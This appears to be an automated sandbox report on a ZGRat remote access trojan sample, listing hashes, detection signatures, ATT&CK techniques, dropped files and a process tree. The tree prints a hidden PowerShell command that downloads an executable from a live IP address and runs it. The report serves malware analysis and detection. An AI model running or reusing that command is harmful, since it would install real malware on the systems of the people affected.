zgrat | 623afd3e2835f4a6b597f7aeec9301521778e3f82365d745e81de37f800bd1b7

General

Target

Sh1t.dll
Size

12.3MB
MD5

8d1e6c16a13ef1b1d8d681d6aa920e67
SHA1

1f061ab5845a9ab887f1f1367016fc9600517e08
SHA256

623afd3e2835f4a6b597f7aeec9301521778e3f82365d745e81de37f800bd1b7
SHA512

b8052b50d8c7b25bacd4831417a83e6e40d351c712071f3cdceb167e498037e88e5b219646090a8f09e0b0246204432d5e28e1b644a640af332acf11d3ae35a6
SSDEEP

196608:Hf8xXyVKVap/Xq/pefvyKEpb6O9DNe23Nn1cRTi+VVYAePVeRgUQWoWzUB+:/f1tqBefvTOhg0GrVY78oR0

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/files/0x000d000000023352-46.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	220	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
220	powershell.exe
220	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2764	1.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
940	rundll32.exe
940	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4408	4952	WerFault.exe	95

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
940	rundll32.exe
940	rundll32.exe
220	powershell.exe
220	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	220	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 940 wrote to memory of 220	940	rundll32.exe	85
PID 940 wrote to memory of 220	940	rundll32.exe	85
PID 220 wrote to memory of 2764	220	powershell.exe	92
PID 220 wrote to memory of 2764	220	powershell.exe	92
PID 220 wrote to memory of 2764	220	powershell.exe	92

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Sh1t.dll,#1
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -command Invoke-WebRequest -Uri 'http://5.42.80.34/gm2.exe' -OutFile '1.exe'; Start-Process '1.exe'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    - Executes dropped EXE
    PID:2764
  - - C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe"
      4⤵
      PID:4952
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 1008
        5⤵
        Program crash
        
        PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe
      "C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe"
      4⤵
      PID:3100
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\comDriverinto\yqpI0X0JgApYgtlSsocRWTSVHRK.vbe"
        5⤵
        
        PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4952 -ip 4952
1⤵
PID:2468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
2.3MB

MD5
2ce10fcd4e165a82a76f77d1f661fa36

SHA1
a3ffe8a330d9e2128172b74dd76f0a31060c0e1e

SHA256
21015dd4a12034f48c1432acbf1149131a3dd1412f4b8426ec7273d95dc19da6

SHA512
f2ed5af0ba9173d483943d7a3761ae2419232ec52980597dfc7ef9c79516297fd2df63970528faeed14f642fb1dbc00114d659068c33cc619ff70583da0bc818

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe

Filesize
368KB

MD5
e56343f2eb88fef62d4cf5df0a2c7734

SHA1
21f1b3a3dcbc29388bb72bc7aa7fc4ce654c6135

SHA256
d3e4275fe34ac20bb9d3c53e9971d2a21ba8f7ec5dc8b943c1a52edb2aa0f1ea

SHA512
b56053c8f0f86ee235cce13601000ed31622b87a5b5b6ed7e723b94bc4a9281918feccbab1f99d827187982ad4d5de2eafb02dd8d6dd179b49e2e029eeef4f32

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5z1430i.tdh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe

Filesize
2.3MB

MD5
92a0909017b45d6498197b1b817e9303

SHA1
bc8a0aad4e4f3e6ddbd816a98873b24ba22bf502

SHA256
71fcb54017a98fe981d8b725891371518878e684acc63ca9c81f284f5e4b6e23

SHA512
b59ae5bd68f1ef934dbba306312c288f1e81b744cf717cff4a529f7b2ed779cd4f85d85e77b0589d1971d42896b8523b495ae1d81921d75cb7df43308940a021

Download Submit
C:\comDriverinto\yqpI0X0JgApYgtlSsocRWTSVHRK.vbe

Filesize
236B

MD5
4ef5f91cd4fabd32da27992dacfc6ad6

SHA1
e6aae689706c107b9b6ff58e474df1d3fe1f16ff

SHA256
fc9b4a6b7b877ee52d56c5b1440de893d1b2bce5fbdf96c6233274af24a2cea7

SHA512
bc1698dc036031250e9dcb9c0d7b87271b1dc15fdaf63ef991aab195cdf9fe4056b2a4a164f46346cb9bfe63aa6c458555de43c9c96945f0f5752d983b1536b6

Download Submit
memory/220-18-0x00007FF8E8AC3000-0x00007FF8E8AC5000-memory.dmp

Filesize
8KB

Download
memory/220-17-0x0000025DAEEF0000-0x0000025DAEF00000-memory.dmp

Filesize
64KB

Download
memory/220-11-0x0000025DAEEC0000-0x0000025DAEEE2000-memory.dmp

Filesize
136KB

Download
memory/220-16-0x0000025DAEEF0000-0x0000025DAEF00000-memory.dmp

Filesize
64KB

Download
memory/940-3-0x00007FF8E9590000-0x00007FF8EA913000-memory.dmp

Filesize
19.5MB

Download
memory/940-0-0x00007FF8E9598000-0x00007FF8E9CC9000-memory.dmp

Filesize
7.2MB

Download
memory/940-4-0x00007FF8E9590000-0x00007FF8EA913000-memory.dmp

Filesize
19.5MB

Download
memory/940-5-0x00007FF8E9590000-0x00007FF8EA913000-memory.dmp

Filesize
19.5MB

Download
memory/940-2-0x00007FF9083E0000-0x00007FF9083E2000-memory.dmp

Filesize
8KB

Download
memory/940-1-0x00007FF9083D0000-0x00007FF9083D2000-memory.dmp

Filesize
8KB

Download
memory/4952-52-0x0000000000A40000-0x0000000000AA2000-memory.dmp

Filesize
392KB

Download
memory/4952-53-0x0000000005A10000-0x0000000005FB4000-memory.dmp

Filesize
5.6MB

Download
memory/4952-54-0x0000000005500000-0x0000000005592000-memory.dmp

Filesize
584KB

Download
memory/4952-55-0x00000000055A0000-0x0000000005606000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing